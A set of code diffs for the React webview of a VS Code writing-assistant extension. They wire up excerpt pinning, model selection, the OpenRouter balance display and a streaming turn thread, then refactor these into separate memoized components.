+    [MessageType.STATUS]: workshop.handleStatusMessage,
+    [MessageType.ERROR]: workshop.handleErrorMessage,
+    [MessageType.MODEL_DATA]: modelsSettings.handleModelData,
+    [MessageType.SETTINGS_DATA]: modelsSettings.handleSettingsData,
+    [MessageType.TOKEN_USAGE_UPDATE]: tokenTracking.handleTokenUsageUpdate,
+    [MessageType.ACCOUNT_BALANCE_DATA]: accountBalance.handleAccountBalanceData,
+    [MessageType.API_KEY_STATUS]: handleApiKeyStatus,
+  });
+
+  usePersistence({
+    ...workshop.persistedState,
+    ...modelsSettings.persistedState,
+    ...tokenTracking.persistedState,
+    ...accountBalance.persistedState,
+  });
+
+  // Initial data requests (session itself is requested inside useWorkshop)
+  React.useEffect(() => {
+    modelsSettings.requestModelData();
+  }, [modelsSettings.requestModelData]);
+
+  React.useEffect(() => {
+    vscode.postMessage({
+      type: MessageType.REQUEST_API_KEY,
+      source: 'webview.workshop',
+      payload: {},
+      timestamp: Date.now(),
+    });
+  }, [vscode]);
+
+  // Error boundary plumbing — same reporting path as App.tsx
+  const handleBoundaryError = React.useCallback(
+    (error: Error, errorInfo: React.ErrorInfo) => {
+      vscode.postMessage({
+        type: MessageType.WEBVIEW_ERROR,
+        source: 'webview.error_boundary',
+        payload: {
+          message: error.message,
+          details: errorInfo.componentStack || undefined,
+        },
+        timestamp: Date.now(),
+      });
+    },
+    [vscode]
+  );
+  const railErrorRef = React.useRef<ErrorBoundary>(null);
+  const threadErrorRef = React.useRef<ErrorBoundary>(null);
+  const composerErrorRef = React.useRef<ErrorBoundary>(null);
+
+  // Thread autoscroll: follow new turns and streaming paint.
+  const threadRef = React.useRef<HTMLDivElement>(null);
+  React.useEffect(() => {
+    const el = threadRef.current;
+    if (el) {
+      el.scrollTop = el.scrollHeight;
+    }
+  }, [workshop.turns, workshop.streamingContent, workshop.isRunning]);
+
+  const pinDraft = () => {
+    const text = draftExcerpt.trim();
+    if (!text) {return;}
+    workshop.pinExcerpt(draftExcerpt);
+    setEditingExcerpt(false);
+  };
+
+  const beginEditingExcerpt = () => {
+    setDraftExcerpt(workshop.excerpt?.text ?? '');
+    setEditingExcerpt(true);
+  };
+
+  const toolsEnabled = !!workshop.excerpt && !workshop.isRunning && workshop.sessionReady;
+
+  // Live run bubble: visible from run start until the assistant turn lands.
+  const showLiveTurn = workshop.isRunning || workshop.isStreaming || workshop.streamingContent.length > 0;
+
+  const openrouter = accountBalance.openrouter;
+  const remaining = openrouter?.credits?.remaining;
+  const balanceTitle = (() => {
+    if (!openrouter || openrouter.status === 'no_key') {
+      return 'OpenRouter balance — no API key configured';
+    }
+    const parts: string[] = [];
+    if (typeof remaining === 'number') {parts.push(`Credits remaining: $${remaining.toFixed(2)}`);}
+    if (typeof tokenTracking.lastRequestCostUsd === 'number') {
+      parts.push(`Last request: $${tokenTracking.lastRequestCostUsd.toFixed(4)}`);
+    }
+    if (openrouter.creditsStatus !== 'ok') {parts.push('Account balance unavailable');}
+    return parts.join(' · ') || 'OpenRouter balance';
+  })();
+
+  const renderTurn = (turn: WorkshopTurn) => {
+    if (turn.role === 'user') {
+      return (
+        <div key={turn.id} className="pm-ws-turn pm-ws-turn-user">
+          <span className="pm-ws-turn-chip">
+            <Icon name={TOOL_ICONS[turn.toolId] ?? 'bolt'} size={13} /> {turn.toolLabel}
+          </span>
+        </div>
+      );
+    }
+    return (
+      <div key={turn.id} className="pm-ws-turn pm-ws-turn-assistant">
+        <div className="pm-ws-turn-head">
+          <span className="pm-ws-eyebrow">
+            <Icon name="sparkle" size={12} /> {turn.toolLabel}
+          </span>
+          {turn.usage && (
+            <span className="pm-ws-turn-usage">{turn.usage.totalTokens.toLocaleString()} tokens</span>
+          )}
+        </div>
+        {turn.truncated && (
+          <p className="pm-ws-turn-truncated">Response hit the max-token limit and was truncated.</p>
+        )}
+        <MarkdownRenderer content={turn.content} className="pm-ws-turn-body" />
+      </div>
+    );
+  };
+
   return (
     <div className="pm-ws">
       <header className="pm-ws-header">
@@ -85,95 +252,247 @@ export const WorkshopApp: React.FC = () => {
             <div className="pm-ws-eyebrow pm-ws-header-eyebrow">Prose Minion · Assistant</div>
             <h1 className="pm-ws-title">Workshop</h1>
             <p className="pm-ws-subtitle">
-              <Icon name="doc" size={12} /> No excerpt pinned yet
+              <Icon name="doc" size={12} />{' '}
+              {workshop.excerpt
+                ? `${workshop.excerpt.relativePath ?? 'Pinned excerpt'} · ${countWords(workshop.excerpt.text)} words`
+                : 'No excerpt pinned yet'}
             </p>
           </div>
         </div>
         <div className="pm-ws-header-actions">
-          <button className="pm-ws-reset" type="button" disabled title="Start a fresh session (Sprint 2)">
+          <button
+            className="pm-ws-reset"
+            type="button"
+            onClick={workshop.resetSession}
+            disabled={!workshop.sessionReady}
+            title="Start a fresh session (keeps the pinned excerpt)"
+          >
             <Icon name="refresh" size={13} /> New session
           </button>
-          {/* Static placeholder — wired to useModelsSettings in Sprint 2 */}
-          <button className="pm-ws-model" type="button" disabled title="Model selection (Sprint 2)">
-            Model <Icon name="chevDown" size={13} />
-          </button>
-          {/* Static placeholder — wired to useAccountBalance in Sprint 2 */}
-          <div className="pm-ws-balance" title="OpenRouter balance (Sprint 2)">
-            <span className="pm-ws-balance-dot" />
+          {/* Model select — assistant scope, the same MODEL_DATA rails as the sidebar */}
+          <select
+            className="pm-ws-model"
+            aria-label="Assistant model"
+            value={modelsSettings.modelSelections.assistant ?? ''}
+            onChange={(event) =>
+              modelsSettings.setModelSelection('assistant' as ModelScope, event.target.value)
+            }
+            disabled={modelsSettings.modelOptions.length === 0}
+          >
+            {modelsSettings.modelOptions.length === 0 && <option value="">Model…</option>}
+            {modelsSettings.modelSelections.assistant &&
+              !modelsSettings.modelOptions.some(
+                (option) => option.id === modelsSettings.modelSelections.assistant
+              ) && (
+                <option value={modelsSettings.modelSelections.assistant}>
+                  {modelsSettings.modelSelections.assistant}
+                </option>
+              )}
+            {modelsSettings.modelOptions.map((option) => (
+              <option key={option.id} value={option.id}>
+                {option.label}
+              </option>
+            ))}
+          </select>
+          <div className="pm-ws-balance" title={balanceTitle}>
+            <span
+              className={`pm-ws-balance-dot ${
+                openrouter?.status === 'ok' ? 'pm-ws-balance-dot-ok' : 'pm-ws-balance-dot-off'
+              }`}
+            />
             <span className="pm-ws-balance-label">OpenRouter</span>
-            <span className="pm-ws-balance-val">$ —</span>
+            <span className="pm-ws-balance-val">
+              {typeof remaining === 'number' ? `$ ${remaining.toFixed(2)}` : '$ —'}
+            </span>
           </div>
         </div>
       </header>
 
       <div className="pm-ws-split">
         <aside className="pm-ws-rail" aria-label="Session rail">
-          <div className="pm-ws-block">
-            <div className="pm-ws-block-head">
-              <div className="pm-ws-eyebrow">
-                <Icon name="pin" size={12} /> Working Excerpt
+          <ErrorBoundary
+            ref={railErrorRef}
+            fallback={
+              <TabErrorFallback
+                tabName="Workshop rail"
+                onRetry={() => railErrorRef.current?.reset()}
+              />
+            }
+            onError={handleBoundaryError}
+          >
+            <div className="pm-ws-block">
+              <div className="pm-ws-block-head">
+                <div className="pm-ws-eyebrow">
+                  <Icon name="pin" size={12} /> Working Excerpt
+                </div>
+                {workshop.excerpt && !editingExcerpt ? (
+                  <span className="pm-ws-pill">Pinned</span>
+                ) : null}
               </div>
-              <span className="pm-ws-pill">Pinned</span>
-            </div>
-            <div className="pm-ws-excerpt pm-ws-excerpt-empty">
-              Nothing pinned yet. Select a passage in the editor and send it to the
-              Workshop — it stays in view while you iterate.
-            </div>
-          </div>
 
-          <div className="pm-ws-block">
-            <div className="pm-ws-eyebrow">Context Brief</div>
-            <p className="pm-ws-brief-empty">No context brief loaded.</p>
-          </div>
+              {workshop.excerpt && !editingExcerpt ? (
+                <>
+                  <div className="pm-ws-excerpt">{workshop.excerpt.text}</div>
+                  <button
+                    className="pm-ws-excerpt-edit"
+                    type="button"
+                    onClick={beginEditingExcerpt}
+                    disabled={workshop.isRunning}
+                  >
+                    Replace excerpt…
+                  </button>
+                </>
+              ) : (
+                <>
+                  <textarea
+                    className="pm-ws-excerpt pm-ws-excerpt-input"
+                    value={draftExcerpt}
+                    onChange={(event) => setDraftExcerpt(event.target.value)}
+                    placeholder="Paste a passage to work on — it stays pinned here while you iterate. (Sending a selection from the editor arrives in Sprint 3.)"
+                    rows={7}
+                    aria-label="Excerpt to pin"
+                  />
+                  <div className="pm-ws-excerpt-actions">
+                    <button
+                      className="pm-ws-pin-btn"
+                      type="button"
+                      onClick={pinDraft}
+                      disabled={draftExcerpt.trim().length === 0}
+                    >
+                      <Icon name="pin" size={13} /> Pin excerpt
+                    </button>
+                    {editingExcerpt && (
+                      <button
+                        className="pm-ws-excerpt-edit"
+                        type="button"
+                        onClick={() => setEditingExcerpt(false)}
+                      >
+                        Cancel
+                      </button>
+                    )}
+                  </div>
+                </>
+              )}
+            </div>
 
-          <div className="pm-ws-block pm-ws-block-grow">
-            <div className="pm-ws-eyebrow">Tools</div>
-            <div className="pm-ws-tools" role="list">
-              {RAIL_TOOLS.map((tool) => (
-                <button key={tool.id} className="pm-ws-tool" type="button" disabled role="listitem">
-                  <Icon name={tool.icon} size={15} /> {tool.label}
+            <div className="pm-ws-block">
+              <div className="pm-ws-eyebrow">Context Brief</div>
+              <p className="pm-ws-brief-empty">No context brief loaded.</p>
+            </div>
+
+            <div className="pm-ws-block pm-ws-block-grow">
+              <div className="pm-ws-eyebrow">Tools</div>
+              <div className="pm-ws-tools" role="list">
+                {RAIL_TOOLS.map((tool) => (
+                  <button
+                    key={tool.id}
+                    className={`pm-ws-tool ${
+                      workshop.activeToolId === tool.id ? 'pm-ws-tool-active' : ''
+                    }`}
+                    type="button"
+                    role="listitem"
+                    disabled={!toolsEnabled}
+                    onClick={() => workshop.runTool(tool.id)}
+                    title={
+                      workshop.excerpt
+                        ? `Run ${tool.label} on the pinned excerpt`
+                        : 'Pin an excerpt first'
+                    }
+                  >
+                    <Icon name={tool.icon} size={15} /> {tool.label}
+                  </button>
+                ))}
+                <button className="pm-ws-tool pm-ws-tool-ghost" type="button" disabled>
+                  <Icon name="grid" size={15} /> All {WORKSHOP_TOOLS.length} tools…
                 </button>
-              ))}
-              <button className="pm-ws-tool pm-ws-tool-ghost" type="button" disabled>
-                <Icon name="grid" size={15} /> All {WORKSHOP_TOOLS.length} tools…
-              </button>
+              </div>
             </div>
-          </div>
+          </ErrorBoundary>
         </aside>
 
         <section className="pm-ws-main" aria-label="Session thread">
-          <div className="pm-ws-thread">
-            <div className="pm-ws-thread-empty">
-              <Icon name="sparkle" size={22} />
-              <p className="pm-ws-thread-empty-title">The thread starts when you run a tool.</p>
-              <p className="pm-ws-thread-empty-sub">
-                Analyses and follow-ups will stream in here, with your excerpt pinned on the left.
-              </p>
-            </div>
-          </div>
-
-          <div className="pm-ws-composer-wrap">
-            <div className="pm-ws-composer">
-              <button className="pm-ws-comp-add" type="button" disabled title="Writing tools (Sprint 4)">
-                <Icon name="plus" size={18} />
-              </button>
-              <input
-                className="pm-ws-comp-input"
-                type="text"
-                disabled
-                placeholder="Ask a follow-up, or pick a tool…"
-                aria-label="Message the Workshop (available in a later sprint)"
+          <ErrorBoundary
+            ref={threadErrorRef}
+            fallback={
+              <TabErrorFallback
+                tabName="Workshop thread"
+                onRetry={() => threadErrorRef.current?.reset()}
               />
-              <div className="pm-ws-comp-right">
-                <span className="pm-ws-comp-pill">
-                  <Icon name="grid" size={13} /> Tools
-                </span>
-                <button className="pm-ws-comp-send" type="button" disabled title="Send (Sprint 2)">
-                  <Icon name="send" size={16} />
+            }
+            onError={handleBoundaryError}
+          >
+            <div className="pm-ws-thread" ref={threadRef}>
+              {workshop.errorMessage && (
+                <div className="pm-ws-error" role="alert">
+                  <span>{workshop.errorMessage}</span>
+                  <button type="button" onClick={workshop.clearError} aria-label="Dismiss error">
+                    <Icon name="x" size={13} />
+                  </button>
+                </div>
+              )}
+
+              {workshop.turns.length === 0 && !showLiveTurn && (
+                <div className="pm-ws-thread-empty">
+                  <Icon name="sparkle" size={22} />
+                  <p className="pm-ws-thread-empty-title">The thread starts when you run a tool.</p>
+                  <p className="pm-ws-thread-empty-sub">
+                    Pin an excerpt on the left, pick a tool, and the analysis streams in here.
+                  </p>
+                </div>
+              )}
+
+              {workshop.turns.map(renderTurn)}
+
+              {showLiveTurn && (
+                <div className="pm-ws-turn pm-ws-turn-assistant pm-ws-turn-live">
+                  <StreamingContent
+                    content={workshop.streamingContent}
+                    isStreaming={workshop.isStreaming}
+                    isBuffering={workshop.isBuffering}
+                    chunkCount={workshop.streamingChunkCount}
+                    elapsedMs={workshop.streamingElapsedMs}
+                    initialLatencyMs={workshop.streamingInitialLatencyMs}
+                    chunksPerSecond={workshop.streamingChunksPerSecond}
+                    waitingMessage={workshop.statusMessage || 'Warming up the minion…'}
+                  />
+                </div>
+              )}
+            </div>
+          </ErrorBoundary>
+
+          <ErrorBoundary
+            ref={composerErrorRef}
+            fallback={
+              <TabErrorFallback
+                tabName="Workshop composer"
+                onRetry={() => composerErrorRef.current?.reset()}
+              />
+            }
+            onError={handleBoundaryError}
+          >
+            <div className="pm-ws-composer-wrap">
+              <div className="pm-ws-composer">
+                <button className="pm-ws-comp-add" type="button" disabled title="Writing tools (Sprint 4)">
+                  <Icon name="plus" size={18} />
                 </button>
+                <input
+                  className="pm-ws-comp-input"
+                  type="text"
+                  disabled
+                  placeholder="Ask a follow-up, or pick a tool…"
+                  aria-label="Message the Workshop (available in Sprint 3)"
+                />
+                <div className="pm-ws-comp-right">
+                  <span className="pm-ws-comp-pill">
+                    <Icon name="grid" size={13} /> Tools
+                  </span>
+                  <button className="pm-ws-comp-send" type="button" disabled title="Send (Sprint 3)">
+                    <Icon name="send" size={16} />
+                  </button>
+                </div>
               </div>
             </div>
-          </div>
+          </ErrorBoundary>
         </section>
       </div>
     </div>

--- a/packages/core/src/presentation/webview/WorkshopApp.tsx
+++ b/packages/core/src/presentation/webview/WorkshopApp.tsx
@@ -22,11 +22,13 @@ import { Icon, IconName } from './components/shared/Icon';
 import { PmLogo } from './components/shared/PmLogo';
 import { ErrorBoundary } from './components/shared/ErrorBoundary';
 import { TabErrorFallback } from './components/shared/TabErrorFallback';
-import { MarkdownRenderer } from './components/shared/MarkdownRenderer';
 import { StreamingContent } from './components/shared/StreamingContent';
 import { MessageType } from '@shared/types';
-import { ApiKeyStatusMessage, WorkshopToolId, WorkshopTurn } from '@messages';
+import { ApiKeyStatusMessage, WorkshopToolId } from '@messages';
 import { ModelSelector } from './components/shared/ModelSelector';
+import { ExcerptPanel } from './components/workshop/ExcerptPanel';
+import { WorkshopThread } from './components/workshop/WorkshopThread';
+import { WORKSHOP_TOOL_ICONS } from './components/workshop/workshopToolIcons';
 import {
   WORKSHOP_TOOL_CATALOG,
   WorkshopToolDescriptor
@@ -40,36 +42,18 @@ import { useTokenTracking } from './hooks/domain/useTokenTracking';
 import { useAccountBalance } from './hooks/domain/useAccountBalance';
 import './workshop.css';
 
-/**
- * Icons are presentation-only; ids/labels/grouping come from the shared
- * catalog (`@shared/constants/workshopTools`) so the palette and the
- * handler's turn labels can never drift (deterministic — the LLM never
- * names buttons, epic invariant).
- */
-const TOOL_ICONS: Record<WorkshopToolId, IconName> = {
-  dialogue: 'dialogue',
-  prose: 'pen',
-  gestures: 'hand',
-  cliche: 'stamp',
-  repetition: 'repeat',
-  'decision-points': 'branch',
-  'show-and-tell': 'eye',
-  choreography: 'move',
-  'stock-and-signature': 'target',
-  placeholders: 'search',
-  style: 'palette',
-  editor: 'list',
-  continuity: 'link',
-  fresh: 'sprout',
-};
-
 interface WorkshopTool extends WorkshopToolDescriptor {
   icon: IconName;
 }
 
-/** Catalog + icons; retained export shape from Sprint 1. */
+/**
+ * Catalog + icons; retained export shape from Sprint 1. Ids/labels/grouping
+ * come from the shared catalog (`@shared/constants/workshopTools`) so the
+ * palette and the handler's turn labels can never drift; icons stay
+ * presentation-side (`./components/workshop/workshopToolIcons`).
+ */
 export const WORKSHOP_TOOLS: readonly WorkshopTool[] = WORKSHOP_TOOL_CATALOG.map(
-  (tool) => ({ ...tool, icon: TOOL_ICONS[tool.id] })
+  (tool) => ({ ...tool, icon: WORKSHOP_TOOL_ICONS[tool.id] })
 );
 
 /**
@@ -109,10 +93,6 @@ export const WorkshopApp: React.FC = () => {
   const tokenTracking = useTokenTracking();
   const [hasSavedKey, setHasSavedKey] = React.useState(false);
   const accountBalance = useAccountBalance({ apiKeyConfigured: hasSavedKey });
-
-  // Excerpt editor (local UI state only — the pinned excerpt itself is host state)
-  const [draftExcerpt, setDraftExcerpt] = React.useState('');
-  const [editingExcerpt, setEditingExcerpt] = React.useState(false);
 
   const handleApiKeyStatus = React.useCallback((message: ApiKeyStatusMessage) => {
     setHasSavedKey(!!message.payload?.hasSavedKey);
@@ -182,19 +162,15 @@ export const WorkshopApp: React.FC = () => {
     }
   }, [workshop.turns, workshop.streamingContent, workshop.isRunning]);
 
-  const pinDraft = () => {
-    const text = draftExcerpt.trim();
-    if (!text) {return;}
-    workshop.pinExcerpt(draftExcerpt);
-    setEditingExcerpt(false);
-  };
-
-  const beginEditingExcerpt = () => {
-    setDraftExcerpt(workshop.excerpt?.text ?? '');
-    setEditingExcerpt(true);
-  };
-
   const toolsEnabled = !!workshop.excerpt && !workshop.isRunning && workshop.sessionReady;
+
+  // Recomputing a full word split per streamed token was O(excerpt) work on
+  // the token clock (PR #67 review #11) — the excerpt only changes on re-pin.
+  const excerptText = workshop.excerpt?.text;
+  const excerptWordCount = React.useMemo(() => {
+    const trimmed = excerptText?.trim() ?? '';
+    return trimmed.length === 0 ? 0 : trimmed.split(/\s+/).length;
+  }, [excerptText]);
 
   // Live run bubble: visible from run start until the assistant turn lands.
   const showLiveTurn = workshop.isRunning || workshop.isStreaming || workshop.streamingContent.length > 0;
@@ -214,34 +190,6 @@ export const WorkshopApp: React.FC = () => {
     return parts.join(' · ') || 'OpenRouter balance';
   })();
 
-  const renderTurn = (turn: WorkshopTurn) => {
-    if (turn.role === 'user') {
-      return (
-        <div key={turn.id} className="pm-ws-turn pm-ws-turn-user">
-          <span className="pm-ws-turn-chip">
-            <Icon name={TOOL_ICONS[turn.toolId] ?? 'bolt'} size={13} /> {turn.toolLabel}
-          </span>
-        </div>
-      );
-    }
-    return (
-      <div key={turn.id} className="pm-ws-turn pm-ws-turn-assistant">
-        <div className="pm-ws-turn-head">
-          <span className="pm-ws-eyebrow">
-            <Icon name="sparkle" size={12} /> {turn.toolLabel}
-          </span>
-          {turn.usage && (
-            <span className="pm-ws-turn-usage">{turn.usage.totalTokens.toLocaleString()} tokens</span>
-          )}
-        </div>
-        {turn.truncated && (
-          <p className="pm-ws-turn-truncated">Response hit the max-token limit and was truncated.</p>
-        )}
-        <MarkdownRenderer content={turn.content} className="pm-ws-turn-body" />
-      </div>
-    );
-  };
-
   return (
     <div className="pm-ws">
       <header className="pm-ws-header">
@@ -255,7 +203,7 @@ export const WorkshopApp: React.FC = () => {
             <p className="pm-ws-subtitle">
               <Icon name="doc" size={12} />{' '}
               {workshop.excerpt
-                ? `${workshop.excerpt.relativePath ?? 'Pinned excerpt'} · ${countWords(workshop.excerpt.text)} words`
+                ? `${workshop.excerpt.relativePath ?? 'Pinned excerpt'} · ${excerptWordCount} words`
                 : 'No excerpt pinned yet'}
             </p>
           </div>
@@ -307,60 +255,11 @@ export const WorkshopApp: React.FC = () => {
             }
             onError={handleBoundaryError}
           >
-            <div className="pm-ws-block">
-              <div className="pm-ws-block-head">
-                <div className="pm-ws-eyebrow">
-                  <Icon name="pin" size={12} /> Working Excerpt
-                </div>
-                {workshop.excerpt && !editingExcerpt ? (
-                  <span className="pm-ws-pill">Pinned</span>
-                ) : null}
-              </div>
-
-              {workshop.excerpt && !editingExcerpt ? (
-                <>
-                  <div className="pm-ws-excerpt">{workshop.excerpt.text}</div>
-                  <button
-                    className="pm-ws-excerpt-edit"
-                    type="button"
-                    onClick={beginEditingExcerpt}
-                    disabled={workshop.isRunning}
-                  >
-                    Replace excerpt…
-                  </button>
-                </>
-              ) : (
-                <>
-                  <textarea
-                    className="pm-ws-excerpt pm-ws-excerpt-input"
-                    value={draftExcerpt}
-                    onChange={(event) => setDraftExcerpt(event.target.value)}
-                    placeholder="Paste a passage to work on — it stays pinned here while you iterate. (Sending a selection from the editor arrives in Sprint 3.)"
-                    rows={7}
-                    aria-label="Excerpt to pin"
-                  />
-                  <div className="pm-ws-excerpt-actions">
-                    <button
-                      className="pm-ws-pin-btn"
-                      type="button"
-                      onClick={pinDraft}
-                      disabled={draftExcerpt.trim().length === 0}
-                    >
-                      <Icon name="pin" size={13} /> Pin excerpt
-                    </button>
-                    {editingExcerpt && (
-                      <button
-                        className="pm-ws-excerpt-edit"
-                        type="button"
-                        onClick={() => setEditingExcerpt(false)}
-                      >
-                        Cancel
-                      </button>
-                    )}
-                  </div>
-                </>
-              )}
-            </div>
+            <ExcerptPanel
+              excerpt={workshop.excerpt}
+              isRunning={workshop.isRunning}
+              onPin={workshop.pinExcerpt}
+            />
 
             <div className="pm-ws-block">
               <div className="pm-ws-eyebrow">Context Brief</div>
@@ -428,7 +327,7 @@ export const WorkshopApp: React.FC = () => {
                 </div>
               )}
 
-              {workshop.turns.map(renderTurn)}
+              <WorkshopThread turns={workshop.turns} />
 
               {showLiveTurn && (
                 <div className="pm-ws-turn pm-ws-turn-assistant pm-ws-turn-live">

--- a/packages/core/src/presentation/webview/components/workshop/ExcerptPanel.tsx
+++ b/packages/core/src/presentation/webview/components/workshop/ExcerptPanel.tsx
@@ -1,0 +1,92 @@
+/**
+ * ExcerptPanel — the rail's "Working Excerpt" block (PR #67 review #6:
+ * extracted from WorkshopApp).
+ *
+ * Owns the local paste-draft/editing state; the pinned excerpt itself is
+ * HOST state (WorkshopSessionService) and arrives via props. Pinning posts
+ * WORKSHOP_SET_EXCERPT through the callback — this component never talks to
+ * the wire directly. Editor-selection and file-picker seeding land beside
+ * the paste path in Sprint 3.
+ */
+
+import * as React from 'react';
+import { Icon } from '@components/shared/Icon';
+import { WorkshopExcerpt } from '@messages';
+
+interface ExcerptPanelProps {
+  excerpt: WorkshopExcerpt | null;
+  /** Disables replace/pin while a run is in flight (host guards too). */
+  isRunning: boolean;
+  onPin: (text: string) => void;
+}
+
+export const ExcerptPanel: React.FC<ExcerptPanelProps> = ({ excerpt, isRunning, onPin }) => {
+  const [draft, setDraft] = React.useState('');
+  const [editing, setEditing] = React.useState(false);
+
+  const pinDraft = () => {
+    if (draft.trim().length === 0) {
+      return;
+    }
+    onPin(draft);
+    setEditing(false);
+  };
+
+  const beginEditing = () => {
+    setDraft(excerpt?.text ?? '');
+    setEditing(true);
+  };
+
+  const showPinned = excerpt && !editing;
+
+  return (
+    <div className="pm-ws-block">
+      <div className="pm-ws-block-head">
+        <div className="pm-ws-eyebrow">
+          <Icon name="pin" size={12} /> Working Excerpt
+        </div>
+        {showPinned ? <span className="pm-ws-pill">Pinned</span> : null}
+      </div>
+
+      {showPinned ? (
+        <>
+          <div className="pm-ws-excerpt">{excerpt.text}</div>
+          <button
+            className="pm-ws-excerpt-edit"
+            type="button"
+            onClick={beginEditing}
+            disabled={isRunning}
+          >
+            Replace excerpt…
+          </button>
+        </>
+      ) : (
+        <>
+          <textarea
+            className="pm-ws-excerpt pm-ws-excerpt-input"
+            value={draft}
+            onChange={(event) => setDraft(event.target.value)}
+            placeholder="Paste a passage to work on — it stays pinned here while you iterate. (Sending a selection from the editor arrives in Sprint 3.)"
+            rows={7}
+            aria-label="Excerpt to pin"
+          />
+          <div className="pm-ws-excerpt-actions">
+            <button
+              className="pm-ws-pin-btn"
+              type="button"
+              onClick={pinDraft}
+              disabled={draft.trim().length === 0 || isRunning}
+            >
+              <Icon name="pin" size={13} /> Pin excerpt
+            </button>
+            {editing && (
+              <button className="pm-ws-excerpt-edit" type="button" onClick={() => setEditing(false)}>
+                Cancel
+              </button>
+            )}
+          </div>
+        </>
+      )}
+    </div>
+  );
+};

--- a/packages/core/src/presentation/webview/components/workshop/WorkshopThread.tsx
+++ b/packages/core/src/presentation/webview/components/workshop/WorkshopThread.tsx
@@ -1,0 +1,28 @@
+/**
+ * WorkshopThread — the accumulated turn history, memoized as a render
+ * boundary (PR #67 review #6/#11 consensus, Tim + Parker).
+ *
+ * WorkshopApp re-renders on every STREAM_CHUNK; without this seam each token
+ * re-walked the full `turns.map(...)`. The `turns` array's identity only
+ * changes when a turn lands or a snapshot reconciles, so React.memo makes
+ * the whole history skip token-clock renders — only the live bubble (kept in
+ * the parent) subscribes to per-chunk state.
+ */
+
+import * as React from 'react';
+import { WorkshopTurn } from '@messages';
+import { WorkshopTurnBubble } from './WorkshopTurnBubble';
+
+interface WorkshopThreadProps {
+  turns: readonly WorkshopTurn[];
+}
+
+export const WorkshopThread: React.FC<WorkshopThreadProps> = React.memo(({ turns }) => (
+  <>
+    {turns.map((turn) => (
+      <WorkshopTurnBubble key={turn.id} turn={turn} />
+    ))}
+  </>
+));
+
+WorkshopThread.displayName = 'WorkshopThread';

--- a/packages/core/src/presentation/webview/components/workshop/WorkshopTurnBubble.tsx
+++ b/packages/core/src/presentation/webview/components/workshop/WorkshopTurnBubble.tsx
@@ -1,0 +1,51 @@
+/**
+ * WorkshopTurnBubble — one completed entry in the Workshop thread
+ * (PR #67 review #6: extracted from WorkshopApp's renderTurn).
+ *
+ * User turns render as a compact request chip; assistant turns as a card
+ * with the tool eyebrow, usage footer, optional truncation notice, and the
+ * markdown body. Memoized: turns are immutable once appended, so a bubble
+ * never needs to re-render after it first paints — only the live streaming
+ * bubble rides the token clock.
+ */
+
+import * as React from 'react';
+import { Icon } from '@components/shared/Icon';
+import { MarkdownRenderer } from '@components/shared/MarkdownRenderer';
+import { WorkshopTurn } from '@messages';
+import { workshopToolIcon } from './workshopToolIcons';
+
+interface WorkshopTurnBubbleProps {
+  turn: WorkshopTurn;
+}
+
+export const WorkshopTurnBubble: React.FC<WorkshopTurnBubbleProps> = React.memo(({ turn }) => {
+  if (turn.role === 'user') {
+    return (
+      <div className="pm-ws-turn pm-ws-turn-user">
+        <span className="pm-ws-turn-chip">
+          <Icon name={workshopToolIcon(turn.toolId)} size={13} /> {turn.toolLabel}
+        </span>
+      </div>
+    );
+  }
+
+  return (
+    <div className="pm-ws-turn pm-ws-turn-assistant">
+      <div className="pm-ws-turn-head">
+        <span className="pm-ws-eyebrow">
+          <Icon name="sparkle" size={12} /> {turn.toolLabel}
+        </span>
+        {turn.usage && (
+          <span className="pm-ws-turn-usage">{turn.usage.totalTokens.toLocaleString()} tokens</span>
+        )}
+      </div>
+      {turn.truncated && (
+        <p className="pm-ws-turn-truncated">Response hit the max-token limit and was truncated.</p>
+      )}
+      <MarkdownRenderer content={turn.content} className="pm-ws-turn-body" />
+    </div>
+  );
+});
+
+WorkshopTurnBubble.displayName = 'WorkshopTurnBubble';

--- a/packages/core/src/presentation/webview/components/workshop/workshopToolIcons.ts
+++ b/packages/core/src/presentation/webview/components/workshop/workshopToolIcons.ts
@@ -1,0 +1,30 @@
+/**
+ * Icon assignments for the Workshop tool catalog — presentation-only, kept
+ * out of the shared catalog (`@shared/constants/workshopTools`) so the host
+ * never depends on webview icon names. Consumed by the rail palette and the
+ * thread's turn bubbles.
+ */
+
+import { IconName } from '@components/shared/Icon';
+import { WorkshopToolId } from '@messages';
+
+export const WORKSHOP_TOOL_ICONS: Record<WorkshopToolId, IconName> = {
+  dialogue: 'dialogue',
+  prose: 'pen',
+  gestures: 'hand',
+  cliche: 'stamp',
+  repetition: 'repeat',
+  'decision-points': 'branch',
+  'show-and-tell': 'eye',
+  choreography: 'move',
+  'stock-and-signature': 'target',
+  placeholders: 'search',
+  style: 'palette',
+  editor: 'list',
+  continuity: 'link',
+  fresh: 'sprout',
+};
+
+/** Icon for a tool id, with a safe fallback for forward compat. */
+export const workshopToolIcon = (id: WorkshopToolId): IconName =>
+  WORKSHOP_TOOL_ICONS[id] ?? 'bolt';

--- a/packages/core/src/presentation/webview/hooks/domain/useWorkshop.ts
+++ b/packages/core/src/presentation/webview/hooks/domain/useWorkshop.ts
@@ -1,0 +1,295 @@
+/**
+ * useWorkshop — Domain hook for the Workshop editor tab (ADR 2026-07-03,
+ * Sprint 2 — session spine). Mirrors WorkshopHandler, the 12th domain.
+ *
+ * The hook RENDERS the session; it never owns it. Host-side
+ * WorkshopSessionService is the aggregate of record: on mount the hook
+ * requests a snapshot (reload-safe rehydration), WORKSHOP_TURN increments the
+ * thread live, WORKSHOP_SESSION_STATE reconciles it wholesale, and streaming
+ * chunks under `domain: 'workshop'` paint the in-flight run. Sprint 2 is
+ * single-turn: running a tool starts a fresh turn; free-text follow-ups are
+ * Sprint 3.
+ */
+
+import * as React from 'react';
+import { useVSCodeApi } from '../useVSCodeApi';
+import { useStreaming } from '../useStreaming';
+import { MessageType } from '@shared/types';
+import {
+  ErrorMessage,
+  StatusMessage,
+  StreamChunkMessage,
+  StreamCompleteMessage,
+  StreamStartedMessage,
+  WorkshopExcerpt,
+  WorkshopSessionStateMessage,
+  WorkshopToolId,
+  WorkshopTurn,
+  WorkshopTurnMessage
+} from '@messages';
+
+export interface WorkshopState {
+  /** True once the first host snapshot has arrived (gate for "empty" UI). */
+  sessionReady: boolean;
+  excerpt: WorkshopExcerpt | null;
+  turns: WorkshopTurn[];
+  /** Tool of the in-flight run (host truth via session state / live events). */
+  activeToolId: WorkshopToolId | null;
+  /** True while a run is in flight (tool palette disables on this). */
+  isRunning: boolean;
+  statusMessage: string;
+  tickerMessage: string;
+  errorMessage: string;
+  // Streaming state for the live turn
+  isStreaming: boolean;
+  isBuffering: boolean;
+  streamingContent: string;
+  streamingChunkCount: number;
